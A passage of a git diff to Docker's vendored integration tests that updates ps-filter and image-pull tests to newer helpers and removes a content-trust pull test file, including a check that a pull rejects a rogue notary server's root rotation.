TestPsListContainersFilterNetwork(c *check.C) { lines = lines[1:] // ps output should have no containers - c.Assert(lines, checker.HasLen, 0) + c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 0) // Filter docker ps on network bridge out, 
_ = dockerCmd(c, "ps", "--filter", "network=bridge") @@ -875,7 +743,7 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { lines = lines[1:] // ps output should have only one container - c.Assert(lines, checker.HasLen, 1) + c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 1) // Making sure onbridgenetwork is on the output c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on network\n")) @@ -890,7 +758,7 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { lines = lines[1:] //ps output should have both the containers - c.Assert(lines, checker.HasLen, 2) + c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 2) // Making sure onbridgenetwork and onnonenetwork is on the output c.Assert(containerOut, checker.Contains, "onnonenetwork", check.Commentf("Missing the container on none network\n")) @@ -903,50 +771,104 @@ func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { containerOut = strings.TrimSpace(string(out)) c.Assert(containerOut, checker.Contains, "onbridgenetwork") + + // Filter by partial network ID + partialnwID := string(nwID[0:4]) + + out, _ = dockerCmd(c, "ps", "--filter", "network="+partialnwID) + containerOut = strings.TrimSpace(string(out)) + + lines = strings.Split(containerOut, "\n") + + // skip header + lines = lines[1:] + + // ps output should have only one container + c.Assert(RemoveLinesForExistingElements(lines, existing), checker.HasLen, 1) + + // Making sure onbridgenetwork is on the output + c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on network\n")) + } func (s *DockerSuite) TestPsByOrder(c *check.C) { name1 := "xyz-abc" - out, err := runSleepingContainer(c, "--name", name1) - c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + out := runSleepingContainer(c, "--name", name1) container1 := 
strings.TrimSpace(out) name2 := "xyz-123" - out, err = runSleepingContainer(c, "--name", name2) - c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + out = runSleepingContainer(c, "--name", name2) container2 := strings.TrimSpace(out) name3 := "789-abc" - out, err = runSleepingContainer(c, "--name", name3) - c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + out = runSleepingContainer(c, "--name", name3) name4 := "789-123" - out, err = runSleepingContainer(c, "--name", name4) - c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + out = runSleepingContainer(c, "--name", name4) // Run multiple time should have the same result - out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz") - c.Assert(err, checker.NotNil) + out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz").Combined() c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1)) // Run multiple time should have the same result - out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz") - c.Assert(err, checker.NotNil) + out = cli.DockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz").Combined() c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1)) } -func (s *DockerSuite) TestPsFilterMissingArgErrorCode(c *check.C) { - _, errCode, _ := dockerCmdWithError("ps", "--filter") - c.Assert(errCode, checker.Equals, 125) +func (s *DockerSuite) TestPsListContainersFilterPorts(c *check.C) { + testRequires(c, DaemonIsLinux) + existingContainers := ExistingContainerIDs(c) + + out, _ := dockerCmd(c, "run", "-d", "--publish=80", "busybox", "top") + id1 := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "run", "-d", "--expose=8080", "busybox", "top") + id2 := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q") + c.Assert(strings.TrimSpace(out), 
checker.Contains, id1) + c.Assert(strings.TrimSpace(out), checker.Contains, id2) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "publish=80-8080/udp") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "expose=8081") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "publish=80-81") + c.Assert(strings.TrimSpace(out), checker.Equals, id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "expose=80/tcp") + c.Assert(strings.TrimSpace(out), checker.Equals, id1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id2) + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-q", "--filter", "expose=8080/tcp") + out = RemoveOutputForExistingElements(out, existingContainers) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), id1) + c.Assert(strings.TrimSpace(out), checker.Equals, id2) } -// Test case for 30291 -func (s *DockerSuite) TestPsFormatTemplateWithArg(c *check.C) { - runSleepingContainer(c, "-d", "--name", "top", "--label", "some.label=label.foo-bar") - out, _ := dockerCmd(c, "ps", "--format", `{{.Names}} {{.Label "some.label"}}`) - c.Assert(strings.TrimSpace(out), checker.Equals, "top label.foo-bar") +func (s *DockerSuite) TestPsNotShowLinknamesOfDeletedContainer(c *check.C) { + testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.31")) + existingContainers := ExistingContainerNames(c) + + dockerCmd(c, "create", "--name=aaa", "busybox", "top") + dockerCmd(c, "create", "--name=bbb", "--link=aaa", "busybox", "top") + + out, _ := dockerCmd(c, "ps", "--no-trunc", "-a", "--format", "{{.Names}}") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") 
+ lines = RemoveLinesForExistingElements(lines, existingContainers) + expected := []string{"bbb", "aaa,bbb/aaa"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with non-truncated names: %v, got: %v", expected, names)) + + dockerCmd(c, "rm", "bbb") + + out, _ = dockerCmd(c, "ps", "--no-trunc", "-a", "--format", "{{.Names}}") + out = RemoveOutputForExistingElements(out, existingContainers) + c.Assert(strings.TrimSpace(out), checker.Equals, "aaa") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go index cb14c2c702..33d4ae5e7c 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go @@ -5,18 +5,19 @@ import ( "fmt" "io/ioutil" "os" - "os/exec" "path/filepath" "runtime" "strings" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest" "github.com/docker/distribution/manifest/manifestlist" "github.com/docker/distribution/manifest/schema2" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "github.com/opencontainers/go-digest" + "gotest.tools/icmd" ) // testPullImageWithAliases pulls a specific image tag and verifies that any aliases (i.e., other @@ -26,7 +27,7 @@ import ( func testPullImageWithAliases(c *check.C) { repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) - repos := []string{} + var repos []string for _, tag := range []string{"recent", "fresh"} { repos = append(repos, fmt.Sprintf("%v:%v", repoName, tag)) } @@ -62,17 +63,16 @@ func (s *DockerSchema1RegistrySuite) TestPullImageWithAliases(c *check.C) { func 
testConcurrentPullWholeRepo(c *check.C) { repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) - repos := []string{} + var repos []string for _, tag := range []string{"recent", "fresh", "todays"} { repo := fmt.Sprintf("%v:%v", repoName, tag) - _, err := buildImage(repo, fmt.Sprintf(` + buildImageSuccessfully(c, repo, build.WithDockerfile(fmt.Sprintf(` FROM busybox ENTRYPOINT ["/bin/echo"] ENV FOO foo ENV BAR bar CMD echo %s - `, repo), true) - c.Assert(err, checker.IsNil) + `, repo))) dockerCmd(c, "push", repo) repos = append(repos, repo) } @@ -87,8 +87,8 @@ func testConcurrentPullWholeRepo(c *check.C) { for i := 0; i != numPulls; i++ { go func() { - _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", "-a", repoName)) - results <- err + result := icmd.RunCommand(dockerBinary, "pull", "-a", repoName) + results <- result.Error }() } @@ -125,8 +125,8 @@ func testConcurrentFailingPull(c *check.C) { for i := 0; i != numPulls; i++ { go func() { - _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repoName+":asdfasdf")) - results <- err + result := icmd.RunCommand(dockerBinary, "pull", repoName+":asdfasdf") + results <- result.Error }() } @@ -151,17 +151,16 @@ func (s *DockerSchema1RegistrySuite) testConcurrentFailingPull(c *check.C) { func testConcurrentPullMultipleTags(c *check.C) { repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) - repos := []string{} + var repos []string for _, tag := range []string{"recent", "fresh", "todays"} { repo := fmt.Sprintf("%v:%v", repoName, tag) - _, err := buildImage(repo, fmt.Sprintf(` + buildImageSuccessfully(c, repo, build.WithDockerfile(fmt.Sprintf(` FROM busybox ENTRYPOINT ["/bin/echo"] ENV FOO foo ENV BAR bar CMD echo %s - `, repo), true) - c.Assert(err, checker.IsNil) + `, repo))) dockerCmd(c, "push", repo) repos = append(repos, repo) } @@ -175,8 +174,8 @@ func testConcurrentPullMultipleTags(c *check.C) { for _, repo := range repos { go func(repo string) { - _, _, 
err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repo)) - results <- err + result := icmd.RunCommand(dockerBinary, "pull", repo) + results <- result.Error }(repo) } @@ -209,21 +208,15 @@ func testPullIDStability(c *check.C) { derivedImage := privateRegistryURL + "/dockercli/id-stability" baseImage := "busybox" - _, err := buildImage(derivedImage, fmt.Sprintf(` + buildImageSuccessfully(c, derivedImage, build.WithDockerfile(fmt.Sprintf(` FROM %s ENV derived true ENV asdf true RUN dd if=/dev/zero of=/file bs=1024 count=1024 CMD echo %s - `, baseImage, derivedImage), true) - if err != nil { - c.Fatal(err) - } + `, baseImage, derivedImage))) - originalID, err := getIDByName(derivedImage) - if err != nil { - c.Fatalf("error inspecting: %v", err) - } + originalID := getIDByName(c, derivedImage) dockerCmd(c, "push", derivedImage) // Pull @@ -232,10 +225,7 @@ func testPullIDStability(c *check.C) { c.Fatalf("repull redownloaded a layer: %s", out) } - derivedIDAfterPull, err := getIDByName(derivedImage) - if err != nil { - c.Fatalf("error inspecting: %v", err) - } + derivedIDAfterPull := getIDByName(c, derivedImage) if derivedIDAfterPull != originalID { c.Fatal("image's ID unexpectedly changed after a repush/repull") @@ -252,17 +242,11 @@ func testPullIDStability(c *check.C) { dockerCmd(c, "rmi", derivedImage) dockerCmd(c, "pull", derivedImage) - derivedIDAfterPull, err = getIDByName(derivedImage) - if err != nil { - c.Fatalf("error inspecting: %v", err) - } + derivedIDAfterPull = getIDByName(c, derivedImage) if derivedIDAfterPull != originalID { c.Fatal("image's ID unexpectedly changed after a repush/repull") } - if err != nil { - c.Fatalf("error inspecting: %v", err) - } // Make sure the image still runs out, _ = dockerCmd(c, "run", "--rm", derivedImage) @@ -283,14 +267,9 @@ func (s *DockerSchema1RegistrySuite) TestPullIDStability(c *check.C) { func testPullNoLayers(c *check.C) { repoName := fmt.Sprintf("%v/dockercli/scratch", privateRegistryURL) - _, err := 
buildImage(repoName, ` + buildImageSuccessfully(c, repoName, build.WithDockerfile(` FROM scratch - ENV foo bar`, - true) - if err != nil { - c.Fatal(err) - } - + ENV foo bar`)) dockerCmd(c, "push", repoName) dockerCmd(c, "rmi", repoName) dockerCmd(c, "pull", repoName) @@ -347,7 +326,7 @@ func (s *DockerRegistrySuite) TestPullManifestList(c *check.C) { manifestListDigest := digest.FromBytes(manifestListJSON) hexDigest := manifestListDigest.Hex() - registryV2Path := filepath.Join(s.reg.dir, "docker", "registry", "v2") + registryV2Path := s.reg.Path() // Write manifest list to blob store blobDir := filepath.Join(registryV2Path, "blobs", "sha256", hexDigest[:2], hexDigest) @@ -411,7 +390,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuthLoginWithSchem err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) c.Assert(err, checker.IsNil) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) b, err := ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) @@ -421,7 +400,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuthLoginWithSchem dockerCmd(c, "--config", tmp, "push", repoName) dockerCmd(c, "--config", tmp, "logout", privateRegistryURL) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, "https://"+privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), "https://"+privateRegistryURL) dockerCmd(c, "--config", tmp, "pull", repoName) // likewise push should work @@ -456,7 +435,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestPullWithExternalAuth(c *check.C) { err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) c.Assert(err, checker.IsNil) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + dockerCmd(c, 
"--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) b, err := ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) @@ -481,12 +460,11 @@ func (s *DockerRegistrySuite) TestRunImplicitPullWithNoTag(c *check.C) { dockerCmd(c, "rmi", repoTag1) dockerCmd(c, "rmi", repoTag2) - out, _, err := dockerCmdWithError("run", repo) - c.Assert(err, check.IsNil) + out, _ := dockerCmd(c, "run", repo) c.Assert(out, checker.Contains, fmt.Sprintf("Unable to find image '%s:latest' locally", repo)) // There should be only one line for repo, the one with repo:latest - outImageCmd, _, err := dockerCmdWithError("images", repo) + outImageCmd, _ := dockerCmd(c, "images", repo) splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n") c.Assert(splitOutImageCmd, checker.HasLen, 2) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go index a0118a8e95..0e88b1e56f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_test.go @@ -7,9 +7,9 @@ import ( "sync" "time" - "github.com/docker/distribution/digest" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "github.com/opencontainers/go-digest" ) // TestPullFromCentralRegistry pulls an image from the central registry and verifies that the client @@ -26,7 +26,7 @@ func (s *DockerHubPullSuite) TestPullFromCentralRegistry(c *check.C) { matches := regexp.MustCompile(`Digest: (.+)\n`).FindAllStringSubmatch(out, -1) c.Assert(len(matches), checker.Equals, 1, check.Commentf("expected exactly one image digest in the output")) c.Assert(len(matches[0]), checker.Equals, 2, check.Commentf("unexpected number of submatches for the digest")) - _, err := digest.ParseDigest(matches[0][1]) + _, err := 
digest.Parse(matches[0][1]) c.Check(err, checker.IsNil, check.Commentf("invalid digest %q in output", matches[0][1])) // We should have a single entry in images. @@ -98,11 +98,11 @@ func (s *DockerHubPullSuite) TestPullNonExistingImage(c *check.C) { for record := range recordChan { if len(record.option) == 0 { c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out)) - c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found: does not exist or no pull access", record.e.repo), check.Commentf("expected image not found error messages")) + c.Assert(record.out, checker.Contains, fmt.Sprintf("pull access denied for %s, repository does not exist or may require 'docker login'", record.e.repo), check.Commentf("expected image not found error messages")) } else { // pull -a on a nonexistent registry should fall back as well c.Assert(record.err, checker.NotNil, check.Commentf("expected non-zero exit status when pulling non-existing image: %s", record.out)) - c.Assert(record.out, checker.Contains, fmt.Sprintf("repository %s not found", record.e.repo), check.Commentf("expected image not found error messages")) + c.Assert(record.out, checker.Contains, fmt.Sprintf("pull access denied for %s, repository does not exist or may require 'docker login'", record.e.repo), check.Commentf("expected image not found error messages")) c.Assert(record.out, checker.Not(checker.Contains), "unauthorized", check.Commentf(`message should not contain "unauthorized"`)) } } @@ -110,7 +110,7 @@ func (s *DockerHubPullSuite) TestPullNonExistingImage(c *check.C) { } // TestPullFromCentralRegistryImplicitRefParts pulls an image from the central registry and verifies -// that pulling the same image with different combinations of implicit elements of the the image +// that pulling the same image with different combinations of implicit elements of the image // reference (tag, repository, central registry url, ...) 
doesn't trigger a new pull nor leads to // multiple images. func (s *DockerHubPullSuite) TestPullFromCentralRegistryImplicitRefParts(c *check.C) { @@ -193,25 +193,26 @@ func (s *DockerHubPullSuite) TestPullScratchNotAllowed(c *check.C) { // results in more images than a naked pull. func (s *DockerHubPullSuite) TestPullAllTagsFromCentralRegistry(c *check.C) { testRequires(c, DaemonIsLinux) - s.Cmd(c, "pull", "busybox") - outImageCmd := s.Cmd(c, "images", "busybox") + s.Cmd(c, "pull", "dockercore/engine-pull-all-test-fixture") + outImageCmd := s.Cmd(c, "images", "dockercore/engine-pull-all-test-fixture") splitOutImageCmd := strings.Split(strings.TrimSpace(outImageCmd), "\n") c.Assert(splitOutImageCmd, checker.HasLen, 2) - s.Cmd(c, "pull", "--all-tags=true", "busybox") - outImageAllTagCmd := s.Cmd(c, "images", "busybox") + s.Cmd(c, "pull", "--all-tags=true", "dockercore/engine-pull-all-test-fixture") + outImageAllTagCmd := s.Cmd(c, "images", "dockercore/engine-pull-all-test-fixture") linesCount := strings.Count(outImageAllTagCmd, "\n") c.Assert(linesCount, checker.GreaterThan, 2, check.Commentf("pulling all tags should provide more than two images, got %s", outImageAllTagCmd)) - // Verify that the line for 'busybox:latest' is left unchanged. + // Verify that the line for 'dockercore/engine-pull-all-test-fixture:latest' is left unchanged. 
var latestLine string for _, line := range strings.Split(outImageAllTagCmd, "\n") { - if strings.HasPrefix(line, "busybox") && strings.Contains(line, "latest") { + if strings.HasPrefix(line, "dockercore/engine-pull-all-test-fixture") && strings.Contains(line, "latest") { latestLine = line break } } - c.Assert(latestLine, checker.Not(checker.Equals), "", check.Commentf("no entry for busybox:latest found after pulling all tags")) + c.Assert(latestLine, checker.Not(checker.Equals), "", check.Commentf("no entry for dockercore/engine-pull-all-test-fixture:latest found after pulling all tags")) + splitLatest := strings.Fields(latestLine) splitCurrent := strings.Fields(splitOutImageCmd[1]) @@ -227,7 +228,7 @@ func (s *DockerHubPullSuite) TestPullAllTagsFromCentralRegistry(c *check.C) { splitCurrent[4] = "" splitCurrent[5] = "" - c.Assert(splitLatest, checker.DeepEquals, splitCurrent, check.Commentf("busybox:latest was changed after pulling all tags")) + c.Assert(splitLatest, checker.DeepEquals, splitCurrent, check.Commentf("dockercore/engine-pull-all-test-fixture:latest was changed after pulling all tags")) } // TestPullClientDisconnect kills the client during a pull operation and verifies that the operation @@ -243,6 +244,7 @@ func (s *DockerHubPullSuite) TestPullClientDisconnect(c *check.C) { c.Assert(err, checker.IsNil) err = pullCmd.Start() c.Assert(err, checker.IsNil) + go pullCmd.Wait() // Cancel as soon as we get some output. 
buf := make([]byte, 10) @@ -257,18 +259,16 @@ func (s *DockerHubPullSuite) TestPullClientDisconnect(c *check.C) { c.Assert(err, checker.NotNil, check.Commentf("image was pulled after client disconnected")) } -func (s *DockerRegistryAuthHtpasswdSuite) TestPullNoCredentialsNotFound(c *check.C) { - // we don't care about the actual image, we just want to see image not found - // because that means v2 call returned 401 and we fell back to v1 which usually - // gives a 404 (in this case the test registry doesn't handle v1 at all) - out, _, err := dockerCmdWithError("pull", privateRegistryURL+"/busybox") - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "Error: image busybox:latest not found") -} - // Regression test for https://github.com/docker/docker/issues/26429 func (s *DockerSuite) TestPullLinuxImageFailsOnWindows(c *check.C) { testRequires(c, DaemonIsWindows, Network) _, _, err := dockerCmdWithError("pull", "ubuntu") + c.Assert(err.Error(), checker.Contains, "no matching manifest") +} + +// Regression test for https://github.com/docker/docker/issues/28892 +func (s *DockerSuite) TestPullWindowsImageFailsOnLinux(c *check.C) { + testRequires(c, DaemonIsLinux, Network) + _, _, err := dockerCmdWithError("pull", "microsoft/nanoserver") c.Assert(err.Error(), checker.Contains, "cannot be used on this platform") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go deleted file mode 100644 index 96a42d6758..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go +++ /dev/null @@ -1,365 +0,0 @@ -package main - -import ( - "fmt" - "io/ioutil" - "os/exec" - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerTrustSuite) TestTrustedPull(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-pull") - - // 
Try pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) - - dockerCmd(c, "rmi", repoName) - // Try untrusted pull to ensure we pushed the tag to the registry - pullCmd = exec.Command(dockerBinary, "pull", "--disable-content-trust=true", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) - -} - -func (s *DockerTrustSuite) TestTrustedIsolatedPull(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-isolated-pull") - - // Try pull (run from isolated directory without trust information) - pullCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated", "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(string(out))) - - dockerCmd(c, "rmi", repoName) -} - -func (s *DockerTrustSuite) TestUntrustedPull(c *check.C) { - repoName := fmt.Sprintf("%v/dockercliuntrusted/pulltest:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - dockerCmd(c, "push", repoName) - dockerCmd(c, "rmi", repoName) - - // Try trusted pull on untrusted tag - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Error: remote trust data does not exist", check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestPullWhenCertExpired(c *check.C) { - c.Skip("Currently changes system time, causing instability") - repoName := 
s.setupTrustedImage(c, "trusted-cert-expired") - - // Certificates have 10 years of expiration - elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf(out)) - }) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", "--disable-content-trust", repoName) - s.trustedCmd(pullCmd) - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf(out)) - }) -} - -func (s *DockerTrustSuite) TestTrustedPullFromBadTrustServer(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclievilpull/trusted:latest", privateRegistryURL) - evilLocalConfigDir, err := ioutil.TempDir("", "evil-local-config-dir") - if err != nil { - c.Fatalf("Failed to create local temp dir") - } - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) - dockerCmd(c, "rmi", repoName) - - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) - dockerCmd(c, "rmi", repoName) - - // Kill the notary server, start a new "evil" one. 
- s.not.Close() - s.not, err = newTestNotary(c) - - c.Assert(err, check.IsNil, check.Commentf("Restarting notary server failed.")) - - // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. - // tag an image and upload it to the private registry - dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) - - // Push up to the new server - pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) - - // Now, try pulling with the original client from this new trust server. This should fail because the new root is invalid. - pullCmd = exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - if err == nil { - c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) - } - if !strings.Contains(out, "could not rotate trust to a new trusted root") { - c.Fatalf("Missing expected output on trusted pull:\n%s", out) - } -} - -func (s *DockerTrustSuite) TestTrustedPullWithExpiredSnapshot(c *check.C) { - c.Skip("Currently changes system time, causing instability") - repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppull/trusted:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - // Push with default passphrases - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf(out)) - - dockerCmd(c, "rmi", repoName) - - // Snapshots last for three years. 
This should be expired - fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4) - - runAtDifferentDate(fourYearsLater, func() { - // Try pull - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - - c.Assert(err, check.NotNil, check.Commentf("Missing expected error running trusted pull with expired snapshots")) - c.Assert(string(out), checker.Contains, "repository out-of-date", check.Commentf(out)) - }) -} - -func (s *DockerTrustSuite) TestTrustedOfflinePull(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-offline-pull") - - pullCmd := exec.Command(dockerBinary, "pull", repoName) - s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver") - out, _, err := runCommandWithOutput(pullCmd) - - c.Assert(err, check.NotNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "error contacting notary server", check.Commentf(out)) - // Do valid trusted pull to warm cache - pullCmd = exec.Command(dockerBinary, "pull", repoName) - s.trustedCmd(pullCmd) - out, _, err = runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) - - dockerCmd(c, "rmi", repoName) - - // Try pull again with invalid notary server, should use cache - pullCmd = exec.Command(dockerBinary, "pull", repoName) - s.trustedCmdWithServer(pullCmd, "https://invalidnotaryserver") - out, _, err = runCommandWithOutput(pullCmd) - - c.Assert(err, check.IsNil, check.Commentf(out)) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf(out)) -} - -func (s *DockerTrustSuite) TestTrustedPullDelete(c *check.C) { - repoName := fmt.Sprintf("%v/dockercli/%s:latest", privateRegistryURL, "trusted-pull-delete") - // tag the image and upload it to the private registry - _, err := buildImage(repoName, ` - FROM busybox - CMD echo trustedpulldelete - `, true) - - pushCmd := exec.Command(dockerBinary, "push", repoName) 
